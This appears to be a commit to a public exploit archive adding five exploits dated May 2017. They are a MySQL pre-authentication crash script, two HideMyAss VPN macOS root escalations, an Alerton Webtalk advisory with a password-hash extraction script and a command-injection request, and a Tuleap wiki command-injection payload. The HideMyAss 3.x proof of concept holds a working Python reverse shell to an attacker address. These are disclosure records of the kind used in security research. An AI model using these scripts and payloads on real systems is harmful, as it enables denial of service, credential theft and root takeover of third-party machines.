DB: 2017-05-02

5 new exploits MySQL <= 5.6.35 / <= 5.7.17 - Integer Overflow HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities Tuleap Project Wiki 8.3 <= 9.6.99.86 - Command Injection
2017-05-02 05:01:18 +00:00 · 2017-05-02 05:01:18 +00:00 · 4aa75d9fe9
commit 4aa75d9fe9
parent e4147fb21e
6 changed files with 444 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -5481,6 +5481,7 @@ id,file,description,date,author,platform,type,port
 41941,platforms/windows/dos/41941.html,"Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption",2017-04-27,"Google Security Research",windows,dos,0
 41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0
 41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
 41954,platforms/multiple/dos/41954.py,"MySQL <= 5.6.35 / <= 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8963,6 +8964,8 @@ id,file,description,date,author,platform,type,port
 41917,platforms/windows/local/41917.py,"Dell Customer Connect 1.3.28.0 - Privilege Escalation",2017-04-25,"Kacper Szurek",windows,local,0
 41923,platforms/linux/local/41923.txt,"LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation",2017-04-25,"G. Geshev",linux,local,0
 41933,platforms/windows/local/41933.txt,"Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation",2017-04-25,"Google Security Research",windows,local,0
 41951,platforms/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation",2017-05-01,"Han Sahin",osx,local,0
 41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -37799,3 +37802,5 @@ id,file,description,date,author,platform,type,port
 41946,platforms/multiple/webapps/41946.txt,"Emby MediaServer 3.2.5 - SQL Injection",2017-04-30,LiquidWorm,multiple,webapps,0
 41947,platforms/multiple/webapps/41947.txt,"Emby MediaServer 3.2.5 - Password Reset",2017-04-30,LiquidWorm,multiple,webapps,0
 41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0
 41950,platforms/linux/webapps/41950.py,"Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities",2017-05-01,"David Tomaschik",linux,webapps,0
 41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 <= 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0
--- a/platforms/linux/webapps/41950.py
+++ b/platforms/linux/webapps/41950.py
@ -0,0 +1,199 @@
 '''
 Security Issues in Alerton Webtalk
 ==================================
 Introduction
 ------------
 Vulnerabilities were identified in the Alerton Webtalk Software supplied by
 Alerton.  This software is used for the management of building automation
 systems.  These were discovered during a black box assessment and therefore
 the vulnerability list should not be considered exhaustive.  Alerton has
 responded that Webtalk is EOL and past the end of its support period.  Customers
 should move to newer products available from Alerton.  Thanks to Alerton for prompt
 replies in communicating with us about these issues.
 Versions 2.5 and 3.3 were both confirmed to be affected by these issues.
 Webtalk-01 - Password Hashes Accessible to Unauthenticated Users
 ----------------------------------------------------------------
 Severity: **High**
 Password hashes for all of the users configured in Alerton Webtalk are
 accessible via a file in the document root of the ‘webtalk’ user.  The
 location of this file is configuration dependent, however the configuration file is
 accessible as well (at a static location, /~webtalk/webtalk.ini).  The
 password
 database is a sqlite3 database whose name is based on the bacnet rep and job
 entries from the ini file.
 A python proof of concept to reproduce this issue is in an appendix.
 Recommendation: Do not store sensitive data within areas being served by the
 webserver.
 Webtalk-02 - Command Injection for Authenticated Webtalk Users
 --------------------------------------------------------------
 Severity: **High**
 Any user granted the “configure webtalk” permission can execute commands as
 the root user on the underlying server.  There appears to be some effort of
 filtering command strings (such as rejecting commands containing pipes and
 redirection operators) but this is inadequate.  Using this vulnerability, an
 attacker can add an SSH key to the root user’s authorized_keys file.
 GET
 /~webtalk/WtStatus.psp?c=update&updateopts=&updateuri=%22%24%28id%29%22&update=True
 HTTP/1.1
 Host: test-host
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101
 Firefox/50.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: NID=...; _SID_=...; OGPC=...:
 Connection: close
 Upgrade-Insecure-Requests: 1
 HTTP/1.1 200 OK
 Date: Mon, 23 Jan 2017 20:34:26 GMT
 Server: Apache
 cache-control: no-cache
 Set-Cookie: _SID_=...; Path=/;
 Connection: close
 Content-Type: text/html; charset=UTF-8
 Content-Length: 2801
 ...
 uid=0(root) gid=500(webtalk) groups=500(webtalk)
 ...
 Recommendation: User input should be avoided to shell commands.  If this is
 not possible, shell commands should be properly escaped.  Consider using one of
 the functions from the subprocess module without the shell=True parameter.
 Webtalk-03 - Cross-Site Request Forgery
 ---------------------------------------
 Severity: **High**
 The entire Webtalk administrative interface lacks any controls against
 Cross-Site Request Forgery.  This allows an attacker to execute
 administrative changes without access to valid credentials.  Combined with the above
 vulnerability, this allows an attacker to gain root access without any
 credentials.
 Recommendation: Implement CSRF tokens on all state-changing actions.
 Webtalk-04 - Insecure Credential Hashing
 ----------------------------------------
 Severity: **Moderate**
 Password hashes in the userprofile.db database are hashed by concatenating
 the password with the username (e.g., PASSUSER) and performing a plain MD5
 hash.  No salts or iterative hashing is performed.  This does not follow password
 hashing best practices and makes for highly practical offline attacks.
 Recommendation: Use scrypt, bcrypt, or argon2 for storing password hashes.
 Webtalk-05 - Login Flow Defeats Password Hashing
 ------------------------------------------------
 Severity: **Moderate**
 Password hashing is performed on the client side, allowing for the replay of
 password hashes from Webtalk-01.  While this only works on the mobile login
 interface (“PDA” interface, /~webtalk/pda/pda_login.psp), the resulting
 session is able to access all resources and is functionally equivalent to a login
 through the Java-based login flow.
 Recommendation: Perform hashing on the server side and use TLS to protect
 secrets in transit.
 Timeline
 --------
 2017/01/?? - Issues Discovered
 2017/01/26 - Issues Reported to security@honeywell.com
 2017/01/30 - Initial response from Alerton confirming receipt.
 2017/02/04 - Alerton reports Webtalk is EOL and issues will not be fixed.
 2017/04/26 - This disclosure
 Discovery
 ---------
 These issues were discovered by David Tomaschik of the Google ISA
 Assessments team.
 Appendix A: Script to Extract Hashes
 ------------------------------------
 '''
 import requests
 import sys
 import ConfigParser
 import StringIO
 import sqlite3
 import tempfile
 import os
 def get_webtalk_ini(base_url):
    """Get the webtalk.ini file and parse it."""
    url = '%s/~webtalk/webtalk.ini' % base_url
    r = requests.get(url)
    if r.status_code != 200:
        raise RuntimeError('Unable to get webtalk.ini: %s', url)
    buf = StringIO.StringIO(r.text)
    parser = ConfigParser.RawConfigParser()
    parser.readfp(buf)
    return parser
 def get_db_path(base_url, config):
    rep = config.get('bacnet', 'rep')
    job = config.get('bacnet', 'job')
    url = '%s/~webtalk/bts/%s/%s/userprofile.db'
    return url % (base_url, rep, job)
 def load_db(url):
    """Load and read the db."""
    r = requests.get(url)
    if r.status_code != 200:
        raise RuntimeError('Unable to get %s.' % url)
    tmpfd, tmpname = tempfile.mkstemp(suffix='.db')
    tmpf = os.fdopen(tmpfd, 'w')
    tmpf.write(r.content)
    tmpf.close()
    con = sqlite3.connect(tmpname)
    cur = con.cursor()
    cur.execute("SELECT UserID, UserPassword FROM tblPassword")
    results = cur.fetchall()
    con.close()
    os.unlink(tmpname)
    return results
 def users_for_server(base_url):
    if '://' not in base_url:
        base_url = 'http://%s' % base_url
    ini = get_webtalk_ini(base_url)
    db_path = get_db_path(base_url, ini)
    return load_db(db_path)
 if __name__ == '__main__':
    for host in sys.argv[1:]:
        try:
            users = users_for_server(host)
        except Exception as ex:
            sys.stderr.write('%s\n' % str(ex))
            continue
        for u in users:
            print '%s:%s' % (u[0], u[1])
--- a/platforms/macos/local/41952.txt
+++ b/platforms/macos/local/41952.txt
@ -0,0 +1,43 @@
 Source: https://www.securify.nl/advisory/SFY20170408/local_privilege_escalation_vulnerability_in_hidemyass_pro_vpn_client_v3_x_for_macos.html
 Abstract
 A local privilege escalation vulnerability has been found in the helper binary com.privax.hmaprovpn.helper that ships with HideMyAss Pro VPN v3.3.0.3 for macOS. The helper is installed setuid root and uses the openvpn binary to create VPN profiles and connections. The helper fails to perform signature check's on the openvpn file, which is owned by the user that installed the client. This allows malware on the system to replace the openvpn binary and run arbitrary code as root.
 Tested versions:
 This issue was tested on HideMyAss Pro VPN v3.3.0.3 for macOS.
 Fix:
 There is currently no fix available.
 Introduction:
 HideMyAss is a popular VPN service that allows users to hide their identity and browse anonymously online. HideMyAss also provides applications to setup the VPN connections, including a client for macOS. It was discovered that version 3.x of HMA Pro VPN for macOS is affected by local privilege escalation.
 Details:
 The helper binary com.privax.hmaprovpn.helper that ships with HideMyAss Pro VPN v3.3.0.3 for macOS is installed in PrivilegedHelperTools and run every time the user reboots. The privileged helper is responsible for opening VPN connections with correct security and connection profile settings.
 The com.privax.hmaprovpn.helper is installed setuid root and fails to perform signature check's on the openvpn executable, which is owned by the user that installed the client. This allows malware on the system to replace the openvpn binary and run arbitrary code as root.
 /advisory/SFY20170408/runopenvpnasroot.png
 /advisory/SFY20170408/startopenvpn.png
 Proof of Concept:
 1) Create an Python script named openvpn and make sure it is executable (chmod u+x).
 #!/usr/bin/python
 import socket,subprocess,os;
 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
 s.connect(("10.0.0.28",8099));os.dup2(s.fileno(),0); 
 os.dup2(s.fileno(),1); 
 os.dup2(s.fileno(),2);
 p=subprocess.call(["/bin/sh","-i"]);
 2) Replace the openvpn binary located in the path below with this Python script.
 /Applications/HMA\!\ Pro\ VPN.app/Contents/XPCServices/HMA\!\ Pro\ VPN\ Engine.xpc/Contents/MacOS/
 3) Wait until the victim opens a VPN connection. 
--- a/platforms/multiple/dos/41954.py
+++ b/platforms/multiple/dos/41954.py
@ -0,0 +1,114 @@
 '''
 # Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599_poc.py
 # Exploit Title: Remote MySQL DOS (Integer Overflow)
 # Google Dork: N/A
 # Date: 13th April 2017
 # Exploit Author: Rodrigo Marcos
 # Vendor Homepage: https://www.mysql.com/
 # Software Link: https://www.mysql.com/downloads/
 # Version: 5.6.35 and below / 5.7.17 and below
 # Tested on: N/A
 # CVE : CVE-2017-3599
 '''
 import socket 
 import sys
 from struct import pack
 '''
 CVE-2017-3599 Proof of Concept exploit code.
 https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/
 Rodrigo Marcos
 '''
 if len(sys.argv)<2:
 	print "Usage: python " + sys.argv[0] + " host [port]"
 	exit(0)
 else:
 	HOST = sys.argv[1]
 	if len(sys.argv)>2:
 		PORT = int(sys.argv[2]) # Yes, no error checking... living on the wild side!
 	else:
 		PORT = 3306
 print "[+] Creating packet..."
 '''
 3 bytes		Packet lenth
 1 bytes 	Packet number
 Login request:
 Packet format (when the server is 4.1 or newer):
 Bytes       Content
 -----       ----
 4           client capabilities
 4           max packet size
 1           charset number
 23          reserved (always 0)
 n           user name, \0-terminated
 n           plugin auth data (e.g. scramble), length encoded
 n           database name, \0-terminated
            (if CLIENT_CONNECT_WITH_DB is set in the capabilities)
 n           client auth plugin name - \0-terminated string,
            (if CLIENT_PLUGIN_AUTH is set in the capabilities)
 '''
 # packet_len = '\x64\x00\x00'
 packet_num = '\x01'
 #Login request packet
 packet_cap = '\x85\xa2\xbf\x01'		# client capabilities (default)
 packet_max = '\x00\x00\x00\x01'		# max packet size (default)
 packet_cset = '\x21'				# charset (default)
 p_reserved = '\x00' * 23 			# 23 bytes reserved with nulls (default)
 packet_usr =  'test\x00' 			# username null terminated (default)
 packet_auth  = '\xff'			# both \xff and \xfe crash the server
 '''
 Conditions to crash:
 1 - packet_auth must start with \xff or \xfe
 2 - packet_auth must be shorter than 8 chars
 The expected value is the password, which could be of two different formats
 (null terminated or length encoded) depending on the client functionality.
 '''
 packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth 
 packet_len = pack('i',len(packet))[:3]
 request = packet_len + packet_num + packet
 print "[+] Connecting to host..."
 try:
 	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 	s.connect((HOST, PORT))
 	print "[+] Connected."
 except:
 	print "[+] Unable to connect to host " + HOST + " on port " + str(PORT) + "."	
 	s.close()
 	print "[+] Exiting."
 	exit(0)
 print "[+] Receiving greeting from remote host..."
 data = s.recv(1024)
 print "[+] Done."
 print "[+] Sending our payload..."
 s.send(request)
 print "[+] Done."
 #print "Our data: %r" % request
 s.close()
--- a/platforms/osx/local/41951.txt
+++ b/platforms/osx/local/41951.txt
@ -0,0 +1,45 @@
 Source: https://www.securify.nl/advisory/SFY20170402/multiple_local_privilege_escalation_vulnerabilities_in_hidemyass_pro_vpn_client_v2_x_for_os_x.html
 Abstract
 Multiple local privilege escalation vulnerabilities were found in the helper binary HMAHelper that ships with HideMyAss Pro VPN for OS X. The helper is installed setuid root and responsible for loading Kernel Extensions (kext) and managing VPN firewall rules. These issues can be leveraged by a local attacker to gain elevated (root) privileges.
 Tested versions:
 This issue was tested on HMA Pro VPN version 2.2.7.0 for OS X
 Fix:
 HMA Support has reported that this issue will not be fixed. Version 2.2.7.0. is still available for download and was earlier this year also available in the Mac App Store. It seems that this version is still available for older versions of OS X (OS X 10.7 - 10.11).
 It should be noted the latest version of HMA Pro VPN for OS X (version 3.3.0.3) is vulnerable to a similar local privilege escalation issue that is also not fixed at the time of writing.
 Introduction:
 HideMyAss is a popular VPN service that allows users to hide their identity and browse anonymously online. HideMyAss also provides applications to setup the VPN connections, including a client for OS X. It was discovered that version 2.x of HMA Pro VPN for OS X is affected by multiple local privilege escalation vulnerabilities.
 Details:
 The helper binary HMAHelper that ships with HMA Pro VPN for OS X is installed as setuid root. The helper has the ability to execute several commands as root, including running kernal extentions (kext) but also enabling and disabling security firewall rules.
 Although disabling the firewall is dangerous enough, it was found that the helper is affected by multiple local privilege escalation vulnerabilities. Taking the FirewallDisable rule as an example, the code snippet below shows that there is no limit to which executable can be executed allowing a local user (or malware) to run any executable as root.
 Privax.OSX.HMA.Helper.FirewallManager 
 private static void FirewallDisableSelected(string path, string args, string processNames)
 {
   using (Process process = new Process())
   {
      ProcessStartInfo startInfo = process.StartInfo;
      startInfo.FileName = "/usr/bin/sudo";
      startInfo.Arguments = string.Format("\"{0}\" \"{1}\" \"{2}\"", (object) path, (object) args, (object) processNames);
      startInfo.CreateNoWindow = true;
      startInfo.UseShellExecute = false;
      PermissionsManager.PermissionsSet(PermissionsManager.UIDRoot, PermissionsManager.GIDWheel);
      process.Start();
      process.WaitForExit();
   }
 }
 Proof of concept:
 /Applications/HMA\!\ Pro\ VPN.app/Contents/Resources/Applications/HMAHelper.app/Contents/MacOS/HMAHelper --sib-firewall-enable 'su' ''
--- a/platforms/php/webapps/41953.txt
+++ b/platforms/php/webapps/41953.txt
@ -0,0 +1,38 @@
 CVE: CVE-2017-7981
 CVSSv3: 9.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:U/RC:C)
 Versions affected: >= 8.3 and <= 9.6.99.86
 Introduction
 Tuleap is a Libre suite to plan, track, code and collaborate on software projects. Tuleap helps development teams to build awesome applications, better, faster, easier.
 Background
 Tuleap uses PHPWiki as a plugin to provide a weak feature for projects. The version of PHPWiki used is 1.3.10. This version contains a command injection vulnerability in the SyntaxHighlighter plugin. Other applications that use PHPWiki similar to Tuleap will also be affected by this issue.
 The latest version of PHPWiki is 1.5.5 and is no longer vulnerable to this issue.
 Vulnerability
 Authenticated users, including unprivileged users, with access to a project containing a wiki, can exploit this command injection (CI) vulnerability to gain remote unauthorised access to the server hosting the Tuleap web application.
 RCE is achieved by entering a SyntaxHighlighter plugin directive in a new wiki page on any wiki available in any project. The SyntaxHighligter plugin in vulnerable versions of PHPWiki passes the syntax argument to the proc_open() PHP builtin function which spawns a process in the operating system running the web application.
 The following is an example plugin directie which would cause the id(1) command to be executed on a Linux server running an affected version of Tuleap.
 <?plugin SyntaxHighlighter syntax="c;id"
 code to be highlighted
 ?>
 Versions Affected
 This vulnerability has existed in the version of PHPWiki used by the Tuleap project since at least version 8.3 through to 9.6.99.86.
 References
 https://github.com/xdrr/vulnerability-research/blob/master/webapp/tuleap/2017.04.tuleap-auth-ci.md
 https://tuleap.net/plugins/tracker/?aid=10159
 Credit
 This vulnerability was discovered by Ben N 19 April 2017.